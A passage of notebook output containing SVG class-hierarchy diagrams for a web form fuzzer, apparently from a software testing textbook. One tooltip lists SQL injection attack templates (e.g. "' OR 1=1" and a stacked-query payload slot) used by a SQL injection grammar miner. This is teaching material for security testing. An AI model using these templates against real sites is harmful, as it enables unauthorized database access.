       "<g id=\"a_node4_14\"><a xlink:href=\"#\" xlink:title=\"__init__(self, url: str, sql_payload: str = &#39;&#39;, *, sql_injection_grammar_miner_class: Optional[type] = None, **kwargs):&#10;Constructor.&#10;`url` &#45; the Web page (with a form) to retrieve&#10;`sql_payload` &#45; the SQL command to execute&#10;`sql_injection_grammar_miner_class` &#45; the miner to be used&#10;(default: SQLInjectionGrammarMiner)&#10;Other keyword arguments are passed to `WebFormFuzzer`.\">\n",
       "<text text-anchor=\"start\" x=\"28.25\" y=\"-25.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node4_15\"><a xlink:href=\"#\" xlink:title=\"get_grammar(self, html_text):&#10;Obtain a grammar with SQL injection commands\">\n",
       "<text text-anchor=\"start\" x=\"28.25\" y=\"-12.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-style=\"italic\" font-size=\"10.00\">get_grammar()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- SQLInjectionFuzzer&#45;&gt;WebFormFuzzer -->\n",
       "<g id=\"edge3\" class=\"edge\">\n",
       "<title>SQLInjectionFuzzer&#45;&gt;WebFormFuzzer</title>\n",
       "<path fill=\"none\" stroke=\"black\" d=\"M67.25,-64.38C67.25,-78.05 67.25,-94.67 67.25,-110.04\"/>\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"63.75,-109.96 67.25,-119.96 70.75,-109.96 63.75,-109.96\"/>\n",
       "</g>\n",
       "<!-- WebRunner -->\n",
       "<g id=\"node5\" class=\"node\">\n",
       "<title>WebRunner</title>\n",
       "<g id=\"a_node5\"><a xlink:href=\"#\" xlink:title=\"class WebRunner:&#10;Runner for a Web server\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"152.5,-4.5 152.5,-64 242,-64 242,-4.5 152.5,-4.5\"/>\n",
       "<text text-anchor=\"start\" x=\"160.5\" y=\"-47.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">WebRunner</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"152.5,-38 242,-38\"/>\n",
       "<g id=\"a_node5_16\"><a xlink:href=\"#\" xlink:title=\"WebRunner\">\n",
       "<g id=\"a_node5_17\"><a xlink:href=\"#\" xlink:title=\"__init__(self, base_url: Optional[str] = None):&#10;Initialize\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-25.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node5_18\"><a xlink:href=\"#\" xlink:title=\"run(self, url: str) &#45;&gt; Tuple[str, str]:&#10;Run the runner with the given input\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-12.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">run()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- Runner -->\n",
       "<g id=\"node6\" class=\"node\">\n",
       "<title>Runner</title>\n",
       "<g id=\"a_node6\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"class Runner:&#10;Base class for testing inputs.\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"159.25,-105 159.25,-210.75 235.25,-210.75 235.25,-105 159.25,-105\"/>\n",
       "<text text-anchor=\"start\" x=\"174.38\" y=\"-194.45\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">Runner</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"159.25,-184.75 235.25,-184.75\"/>\n",
       "<g id=\"a_node6_19\"><a xlink:href=\"#\" xlink:title=\"Runner\">\n",
       "<g id=\"a_node6_20\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"FAIL = &#39;FAIL&#39;\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-171.25\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"10.00\">FAIL</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node6_21\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"PASS = &#39;PASS&#39;\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-158.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"10.00\">PASS</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node6_22\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"UNRESOLVED = &#39;UNRESOLVED&#39;\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-145.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"10.00\">UNRESOLVED</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"159.25,-138.5 235.25,-138.5\"/>\n",
       "<g id=\"a_node6_23\"><a xlink:href=\"#\" xlink:title=\"Runner\">\n",
       "<g id=\"a_node6_24\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"__init__(self) &#45;&gt; None:&#10;Initialize\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-126\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node6_25\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"run(self, inp: str) &#45;&gt; Any:&#10;Run the runner with the given input\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-113.25\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">run()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- WebRunner&#45;&gt;Runner -->\n",
       "<g id=\"edge4\" class=\"edge\">\n",
       "<title>WebRunner&#45;&gt;Runner</title>\n",
       "<path fill=\"none\" stroke=\"black\" d=\"M197.25,-64.38C197.25,-73.16 197.25,-83.17 197.25,-93.28\"/>\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"193.75,-93.16 197.25,-103.16 200.75,-93.16 193.75,-93.16\"/>\n",
       "</g>\n",
       "<!-- HTMLGrammarMiner -->\n",
       "<g id=\"node7\" class=\"node\">\n",
       "<title>HTMLGrammarMiner</title>\n",
       "<g id=\"a_node7\"><a xlink:href=\"#\" xlink:title=\"class HTMLGrammarMiner:&#10;Mine a grammar from a HTML form\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"279.88,-117.75 279.88,-198 428.62,-198 428.62,-117.75 279.88,-117.75\"/>\n",
       "<text text-anchor=\"start\" x=\"287.88\" y=\"-181.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">HTMLGrammarMiner</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"279.88,-172 428.62,-172\"/>\n",
       "<g id=\"a_node7_26\"><a xlink:href=\"#\" xlink:title=\"HTMLGrammarMiner\">\n",
       "<g id=\"a_node7_27\"><a xlink:href=\"#\" xlink:title=\"QUERY_GRAMMAR = {&#39;&lt;start&gt;&#39;: [&#39;&lt;action&gt;?&lt;query&gt;&#39;], &#39;&lt;string&gt;&#39;: [&#39;&lt;letter&gt;&#39;, &#39;&lt;letter&gt;&lt;string&gt;&#39;], &#39;&lt;letter&gt;&#39;: [&#39;&lt;plus&gt;&#39;, &#39;&lt;percent&gt;&#39;, &#39;&lt;other&gt;&#39;], &#39;&lt;plus&gt;&#39;: [&#39;+&#39;], &#39;&lt;percent&gt;&#39;: [&#39;%&lt;hexdigit&#45;1&gt;&lt;hexdigit&gt;&#39;], &#39;&lt;hexdigit&gt;&#39;: [&#39;0&#39;, &#39;1&#39;, &#39;2&#39;, &#39;3&#39;, &#39;4&#39;, &#39;5&#39;, &#39;6&#39;, &#39;7&#39;, &#39;8&#39;, &#39;9&#39;, &#39;a&#39;, &#39;b&#39;, &#39;c&#39;, &#39;d&#39;, &#39;e&#39;, &#39;f&#39;], &#39;&lt;other&gt;&#39;: [&#39;0&#39;, &#39;1&#39;, &#39;2&#39;, &#39;3&#39;, &#39;4&#39;, &#39;5&#39;, &#39;a&#39;, &#39;b&#39;, &#39;c&#39;, &#39;d&#39;, &#39;e&#39;, &#39;&#45;&#39;, &#39;_&#39;], &#39;&lt;text&gt;&#39;: [&#39;&lt;string&gt;&#39;], &#39;&lt;number&gt;&#39;: [&#39;&lt;digits&gt;&#39;], &#39;&lt;digits&gt;&#39;: [&#39;&lt;digit&gt;&#39;, &#39;&lt;digits&gt;&lt;digit&gt;&#39;], &#39;&lt;digit&gt;&#39;: [&#39;0&#39;, &#39;1&#39;, &#39;2&#39;, &#39;3&#39;, &#39;4&#39;, &#39;5&#39;, &#39;6&#39;, &#39;7&#39;, &#39;8&#39;, &#39;9&#39;], &#39;&lt;checkbox&gt;&#39;: [&#39;&lt;_checkbox&gt;&#39;], &#39;&lt;_checkbox&gt;&#39;: [&#39;on&#39;, &#39;off&#39;], &#39;&lt;email&gt;&#39;: [&#39;&lt;_email&gt;&#39;], &#39;&lt;_email&gt;&#39;: [&#39;&lt;string&gt;%40&lt;string&gt;&#39;], &#39;&lt;password&gt;&#39;: [&#39;&lt;_password&gt;&#39;], &#39;&lt;_password&gt;&#39;: [&#39;abcABC.123&#39;], &#39;&lt;hexdigit&#45;1&gt;&#39;: [&#39;3&#39;, &#39;4&#39;, &#39;5&#39;, &#39;6&#39;, &#39;7&#39;], &#39;&lt;submit&gt;&#39;: [&#39;&#39;]}\">\n",
       "<text text-anchor=\"start\" x=\"315.25\" y=\"-158.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"10.00\">QUERY_GRAMMAR</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"279.88,-151.25 428.62,-151.25\"/>\n",
       "<g id=\"a_node7_28\"><a xlink:href=\"#\" xlink:title=\"HTMLGrammarMiner\">\n",
       "<g id=\"a_node7_29\"><a xlink:href=\"#\" xlink:title=\"__init__(self, html_text: str) &#45;&gt; None:&#10;Constructor. `html_text` is the HTML string to parse.\">\n",
       "<text text-anchor=\"start\" x=\"312.25\" y=\"-138.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node7_30\"><a xlink:href=\"#\" xlink:title=\"mine_grammar(self) &#45;&gt; Dict[str, List[Expansion]]:&#10;Extract a grammar from the given HTML text\">\n",
       "<text text-anchor=\"start\" x=\"312.25\" y=\"-125\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"10.00\">mine_grammar()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- SQLInjectionGrammarMiner -->\n",
       "<g id=\"node8\" class=\"node\">\n",
       "<title>SQLInjectionGrammarMiner</title>\n",
       "<g id=\"a_node8\"><a xlink:href=\"#\" xlink:title=\"class SQLInjectionGrammarMiner:&#10;Demonstration of an automatic SQL Injection attack grammar miner\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"260,-0.5 260,-68 448.5,-68 448.5,-0.5 260,-0.5\"/>\n",
       "<text text-anchor=\"start\" x=\"268\" y=\"-51.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">SQLInjectionGrammarMiner</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"260,-42 448.5,-42\"/>\n",
       "<g id=\"a_node8_31\"><a xlink:href=\"#\" xlink:title=\"SQLInjectionGrammarMiner\">\n",
       "<g id=\"a_node8_32\"><a xlink:href=\"#\" xlink:title=\"ATTACKS = [&quot;&lt;string&gt;&#39; &lt;sql&#45;values&gt;); &lt;sql&#45;payload&gt;; &lt;sql&#45;comment&gt;&quot;, &quot;&lt;string&gt;&#39; &lt;sql&#45;comment&gt;&quot;, &quot;&#39; OR 1=1&lt;sql&#45;comment&gt;&#39;&quot;, &#39;&lt;number&gt; OR 1=1&#39;]\">\n",
       "<text text-anchor=\"start\" x=\"333.25\" y=\"-28.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"10.00\">ATTACKS</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"260,-21.25 448.5,-21.25\"/>\n",
       "<g id=\"a_node8_33\"><a xlink:href=\"#\" xlink:title=\"SQLInjectionGrammarMiner\">\n",
       "<g id=\"a_node8_34\"><a xlink:href=\"#\" xlink:title=\"__init__(self, html_text: str, sql_payload: str):&#10;Constructor.&#10;`html_text` &#45; the HTML form to be attacked&#10;`sql_payload` &#45; the SQL command to be executed\">\n",
       "<text text-anchor=\"start\" x=\"324.25\" y=\"-8.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- SQLInjectionGrammarMiner&#45;&gt;HTMLGrammarMiner -->\n",
       "<g id=\"edge5\" class=\"edge\">\n",
       "<title>SQLInjectionGrammarMiner&#45;&gt;HTMLGrammarMiner</title>\n",
       "<path fill=\"none\" stroke=\"black\" d=\"M354.25,-68.48C354.25,-80.12 354.25,-93.46 354.25,-106.19\"/>\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"350.75,-106.13 354.25,-116.13 357.75,-106.13 350.75,-106.13\"/>\n",
       "</g>\n",
       "<!-- Legend -->\n",
       "<g id=\"node9\" class=\"node\">\n",
       "<title>Legend</title>\n",
       "<text text-anchor=\"start\" x=\"466.62\" y=\"-50.25\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"10.00\" fill=\"#b03a2e\">Legend</text>\n",
       "<text text-anchor=\"start\" x=\"466.62\" y=\"-40.25\" font-family=\"Patua One, Helvetica, sans-serif\" font-size=\"10.00\">• </text>\n",
       "<text text-anchor=\"start\" x=\"472.62\" y=\"-40.25\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-size=\"8.00\">public_method()</text>\n",
       "<text text-anchor=\"start\" x=\"466.62\" y=\"-30.25\" font-family=\"Patua One, Helvetica, sans-serif\" font-size=\"10.00\">• </text>\n",
       "<text text-anchor=\"start\" x=\"472.62\" y=\"-30.25\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"8.00\">private_method()</text>\n",
       "<text text-anchor=\"start\" x=\"466.62\" y=\"-20.25\" font-family=\"Patua One, Helvetica, sans-serif\" font-size=\"10.00\">• </text>\n",
       "<text text-anchor=\"start\" x=\"472.62\" y=\"-20.25\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-style=\"italic\" font-size=\"8.00\">overloaded_method()</text>\n",
       "<text text-anchor=\"start\" x=\"466.62\" y=\"-11.2\" font-family=\"Helvetica,sans-Serif\" font-size=\"9.00\">Hover over names to see doc</text>\n",
       "</g>\n",
       "</g>\n",
       "</svg>\n"
      ],
      "text/html": [
       "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n",
       "<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\"\n",
       " \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n",
       "<!-- Generated by graphviz version 12.2.1 (20241206.2353)\n",
       " -->\n",
       "<!-- Pages: 1 -->\n",
       "<svg width=\"594pt\" height=\"451pt\"\n",
       " viewBox=\"0.00 0.00 593.88 450.50\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n",
       "<g id=\"graph0\" class=\"graph\" transform=\"scale(1 1) rotate(0) translate(4 446.5)\">\n",
       "<g id=\"a_graph0\"><a xlink:title=\"WebFormFuzzer class hierarchy\">\n",
       "<polygon fill=\"white\" stroke=\"none\" points=\"-4,4 -4,-446.5 589.88,-446.5 589.88,4 -4,4\"/>\n",
       "</a>\n",
       "</g>\n",
       "<!-- WebFormFuzzer -->\n",
       "<g id=\"node1\" class=\"node\">\n",
       "<title>WebFormFuzzer</title>\n",
       "<g id=\"a_node1\"><a xlink:href=\"#\" xlink:title=\"class WebFormFuzzer:&#10;A Fuzzer for Web forms\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"9,-121.75 9,-194 125.5,-194 125.5,-121.75 9,-121.75\"/>\n",
       "<text text-anchor=\"start\" x=\"17\" y=\"-177.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">WebFormFuzzer</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"9,-168 125.5,-168\"/>\n",
       "<g id=\"a_node1_0\"><a xlink:href=\"#\" xlink:title=\"WebFormFuzzer\">\n",
       "<g id=\"a_node1_1\"><a xlink:href=\"#\" xlink:title=\"__init__(self, url: str, *, grammar_miner_class: Optional[type] = None, **grammar_fuzzer_options):&#10;Constructor.&#10;`url` &#45; the URL of the Web form to fuzz.&#10;`grammar_miner_class` &#45; the class of the grammar miner&#10;to use (default: `HTMLGrammarMiner`)&#10;Other keyword arguments are passed to the `GrammarFuzzer` constructor\">\n",
       "<text text-anchor=\"start\" x=\"28.25\" y=\"-155.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node1_2\"><a xlink:href=\"#\" xlink:title=\"get_grammar(self, html_text: str):&#10;Obtain the grammar for the given HTML `html_text`.&#10;To be overloaded in subclasses.\">\n",
       "<text text-anchor=\"start\" x=\"28.25\" y=\"-142.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-style=\"italic\" font-size=\"10.00\">get_grammar()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node1_3\"><a xlink:href=\"#\" xlink:title=\"get_html(self, url: str):&#10;Retrieve the HTML text for the given URL `url`.&#10;To be overloaded in subclasses.\">\n",
       "<text text-anchor=\"start\" x=\"28.25\" y=\"-130\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-style=\"italic\" font-size=\"10.00\">get_html()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- GrammarFuzzer -->\n",
       "<g id=\"node2\" class=\"node\">\n",
       "<title>GrammarFuzzer</title>\n",
       "<g id=\"a_node2\"><a xlink:href=\"GrammarFuzzer.ipynb\" xlink:title=\"class GrammarFuzzer:&#10;Produce strings from grammars efficiently, using derivation trees.\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"9.38,-247.75 9.38,-320 125.12,-320 125.12,-247.75 9.38,-247.75\"/>\n",
       "<text text-anchor=\"start\" x=\"17.38\" y=\"-303.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">GrammarFuzzer</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"9.38,-294 125.12,-294\"/>\n",
       "<g id=\"a_node2_4\"><a xlink:href=\"#\" xlink:title=\"GrammarFuzzer\">\n",
       "<g id=\"a_node2_5\"><a xlink:href=\"GrammarFuzzer.ipynb\" xlink:title=\"__init__(self, grammar: Dict[str, List[Expansion]], start_symbol: str = &#39;&lt;start&gt;&#39;, min_nonterminals: int = 0, max_nonterminals: int = 10, disp: bool = False, log: Union[bool, int] = False) &#45;&gt; None:&#10;Produce strings from `grammar`, starting with `start_symbol`.&#10;If `min_nonterminals` or `max_nonterminals` is given, use them as limits&#10;for the number of nonterminals produced.&#10;If `disp` is set, display the intermediate derivation trees.&#10;If `log` is set, show intermediate steps as text on standard output.\">\n",
       "<text text-anchor=\"start\" x=\"34.25\" y=\"-281.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node2_6\"><a xlink:href=\"GrammarFuzzer.ipynb\" xlink:title=\"fuzz(self) &#45;&gt; str:&#10;Produce a string from the grammar.\">\n",
       "<text text-anchor=\"start\" x=\"34.25\" y=\"-268.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">fuzz()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node2_7\"><a xlink:href=\"GrammarFuzzer.ipynb\" xlink:title=\"fuzz_tree(self) &#45;&gt; DerivationTree:&#10;Produce a derivation tree from the grammar.\">\n",
       "<text text-anchor=\"start\" x=\"34.25\" y=\"-256\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-size=\"10.00\">fuzz_tree()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- WebFormFuzzer&#45;&gt;GrammarFuzzer -->\n",
       "<g id=\"edge1\" class=\"edge\">\n",
       "<title>WebFormFuzzer&#45;&gt;GrammarFuzzer</title>\n",
       "<path fill=\"none\" stroke=\"black\" d=\"M67.25,-194.41C67.25,-207.38 67.25,-222.25 67.25,-236.06\"/>\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"63.75,-235.82 67.25,-245.82 70.75,-235.82 63.75,-235.82\"/>\n",
       "</g>\n",
       "<!-- Fuzzer -->\n",
       "<g id=\"node3\" class=\"node\">\n",
       "<title>Fuzzer</title>\n",
       "<g id=\"a_node3\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"class Fuzzer:&#10;Base class for fuzzers.\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"29.25,-357 29.25,-442 105.25,-442 105.25,-357 29.25,-357\"/>\n",
       "<text text-anchor=\"start\" x=\"46.62\" y=\"-425.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">Fuzzer</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"29.25,-416 105.25,-416\"/>\n",
       "<g id=\"a_node3_8\"><a xlink:href=\"#\" xlink:title=\"Fuzzer\">\n",
       "<g id=\"a_node3_9\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"__init__(self) &#45;&gt; None:&#10;Constructor\">\n",
       "<text text-anchor=\"start\" x=\"37.25\" y=\"-403.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node3_10\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"fuzz(self) &#45;&gt; str:&#10;Return fuzz input\">\n",
       "<text text-anchor=\"start\" x=\"37.25\" y=\"-390.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">fuzz()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node3_11\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"run(self, runner: Fuzzer.Runner = &lt;Fuzzer.Runner object at 0x11ac515e0&gt;) &#45;&gt; Tuple[subprocess.CompletedProcess, str]:&#10;Run `runner` with fuzz input\">\n",
       "<text text-anchor=\"start\" x=\"37.25\" y=\"-378\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-size=\"10.00\">run()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node3_12\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"runs(self, runner: Fuzzer.Runner = &lt;Fuzzer.PrintRunner object at 0x11ac53ce0&gt;, trials: int = 10) &#45;&gt; List[Tuple[subprocess.CompletedProcess, str]]:&#10;Run `runner` with fuzz input, `trials` times\">\n",
       "<text text-anchor=\"start\" x=\"37.25\" y=\"-365.25\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-size=\"10.00\">runs()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- GrammarFuzzer&#45;&gt;Fuzzer -->\n",
       "<g id=\"edge2\" class=\"edge\">\n",
       "<title>GrammarFuzzer&#45;&gt;Fuzzer</title>\n",
       "<path fill=\"none\" stroke=\"black\" d=\"M67.25,-320.2C67.25,-328.18 67.25,-336.81 67.25,-345.33\"/>\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"63.75,-345.3 67.25,-355.3 70.75,-345.3 63.75,-345.3\"/>\n",
       "</g>\n",
       "<!-- SQLInjectionFuzzer -->\n",
       "<g id=\"node4\" class=\"node\">\n",
       "<title>SQLInjectionFuzzer</title>\n",
       "<g id=\"a_node4\"><a xlink:href=\"#\" xlink:title=\"class SQLInjectionFuzzer:&#10;Simple demonstrator of a SQL Injection Fuzzer\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"0,-4.5 0,-64 134.5,-64 134.5,-4.5 0,-4.5\"/>\n",
       "<text text-anchor=\"start\" x=\"8\" y=\"-47.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">SQLInjectionFuzzer</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"0,-38 134.5,-38\"/>\n",
       "<g id=\"a_node4_13\"><a xlink:href=\"#\" xlink:title=\"SQLInjectionFuzzer\">\n",
       "<g id=\"a_node4_14\"><a xlink:href=\"#\" xlink:title=\"__init__(self, url: str, sql_payload: str = &#39;&#39;, *, sql_injection_grammar_miner_class: Optional[type] = None, **kwargs):&#10;Constructor.&#10;`url` &#45; the Web page (with a form) to retrieve&#10;`sql_payload` &#45; the SQL command to execute&#10;`sql_injection_grammar_miner_class` &#45; the miner to be used&#10;(default: SQLInjectionGrammarMiner)&#10;Other keyword arguments are passed to `WebFormFuzzer`.\">\n",
       "<text text-anchor=\"start\" x=\"28.25\" y=\"-25.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node4_15\"><a xlink:href=\"#\" xlink:title=\"get_grammar(self, html_text):&#10;Obtain a grammar with SQL injection commands\">\n",
       "<text text-anchor=\"start\" x=\"28.25\" y=\"-12.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-style=\"italic\" font-size=\"10.00\">get_grammar()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- SQLInjectionFuzzer&#45;&gt;WebFormFuzzer -->\n",
       "<g id=\"edge3\" class=\"edge\">\n",
       "<title>SQLInjectionFuzzer&#45;&gt;WebFormFuzzer</title>\n",
       "<path fill=\"none\" stroke=\"black\" d=\"M67.25,-64.38C67.25,-78.05 67.25,-94.67 67.25,-110.04\"/>\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"63.75,-109.96 67.25,-119.96 70.75,-109.96 63.75,-109.96\"/>\n",
       "</g>\n",
       "<!-- WebRunner -->\n",
       "<g id=\"node5\" class=\"node\">\n",
       "<title>WebRunner</title>\n",
       "<g id=\"a_node5\"><a xlink:href=\"#\" xlink:title=\"class WebRunner:&#10;Runner for a Web server\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"152.5,-4.5 152.5,-64 242,-64 242,-4.5 152.5,-4.5\"/>\n",
       "<text text-anchor=\"start\" x=\"160.5\" y=\"-47.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">WebRunner</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"152.5,-38 242,-38\"/>\n",
       "<g id=\"a_node5_16\"><a xlink:href=\"#\" xlink:title=\"WebRunner\">\n",
       "<g id=\"a_node5_17\"><a xlink:href=\"#\" xlink:title=\"__init__(self, base_url: Optional[str] = None):&#10;Initialize\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-25.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
